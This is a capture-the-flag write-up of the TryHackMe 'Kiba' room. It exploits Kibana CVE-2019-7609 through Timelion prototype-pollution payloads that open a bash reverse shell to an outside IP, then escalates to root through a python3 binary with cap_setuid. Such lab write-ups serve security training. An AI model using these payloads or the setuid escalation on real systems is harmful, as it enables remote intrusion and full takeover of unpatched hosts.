Sep 10, 2020

Overview

quick writeup, explaining

• Kibana arbitrary code execution flaw, CVE-2019-7609
• linux capabilities
• how we got full system on kiba machine from tryhackme

Target Informations

TARGET IP ADRESS    : 10.10.153.5
DOMAIN NAME         : kiba.thm
ROOM URL            : https://tryhackme.com/room/kiba
Descriptions        : Identify the critical security flaw in the data visualization dashboard, that allows execute remote code execution.

External Enumeration

Port Scaning

running a simple nmap scan against the target host, we get 3 open ports.

m3dsec@local:~/kiba.thm$  nmap -sC -sV -oN nmap/namp_tcp_simple 10.10.153.5
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
5601/tcp open  esmagent

nothing much on port 80, but accessing port 5601 reveal a Kibana dashboard version 6.5.4, which is vulnerable to prototype pollution vulnerability, under CVE-2019-7609.

there is quite good articles out there explainning how a malicious actor can laverage from a normal user, to get a full access into the backend of the application

however the main idea is each time we click on "convas", kibana spawn a new process, and as long as we have controle over the enviremental variables passed to that new spawned process, we can execute javascript code, that lead us to a Remote Code Execution on the target host

Exploit

• Open Kibana
• Past one of the following payload into the Timelion visualizer
• Click run
• On the left panel click on Canvas
• Your reverse shell should pop ! 😃

Here are some payloads, that we can use.

• payload1

.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/10.9.123.226/9991 0>&1");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

• payload 2

.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i>& /dev/tcp/10.9.123.226/9991 0>&1\'");//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

and we got our foothold on the target as user kiba

Privilege escalation

quickly after getting in, running getcap command

kiba@hostname:~$ getcap -r / 2>/dev/null
/home/kiba/.hackmeplease/python3 = cap_setuid+ep
...

we can notice that there is a python binary file on the user home directory that got some special capabilities cap_setuid+ep that we can abuse to get root on the target system, but 1st

What are capabilities :
capabilities are a set of actions that can be used to give only a portion of higher privileges, therefore limit users permission.

Example :
Suppose a web server normally runs at port 80 and we also know that we need root permissions to start listening on one of the lower ports (<1024).
the daemon needs to be able to listen to port 80. Instead of giving this daemon all root permissions, we can set a capability on the related binary, like CAP_NET_BIND_SERVICE. With this specific capability, it can open up port 80 in a much easier way.

in our case, we have cap_setuid whish is pretty f#!@up if u ask me, it let us sets the effective user-id of the process to what ever we want.

we can easly get a root shell on the target host, by droping the effective user id to 0 (root UID)

with this simple command:

kiba@hostname:~$ /home/kiba/.hackmeplease/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
# id
uid=0(root) gid=0(root) groups=0(root)

Questions answers

sorry, we don't provide easy response here, u'll need to do the machine by yourself.

Some Resources

1. https://nvd.nist.gov/vuln/detail/CVE-2019-7609
2. https://www.tenable.com/blog/cve-2019-7609-exploit-script-available-for-kibana-remote-code-execution-vulnerability
3. https://gtfobins.github.io/gtfobins/python/#capabilities

Best Regards

m3dsec.

back to Main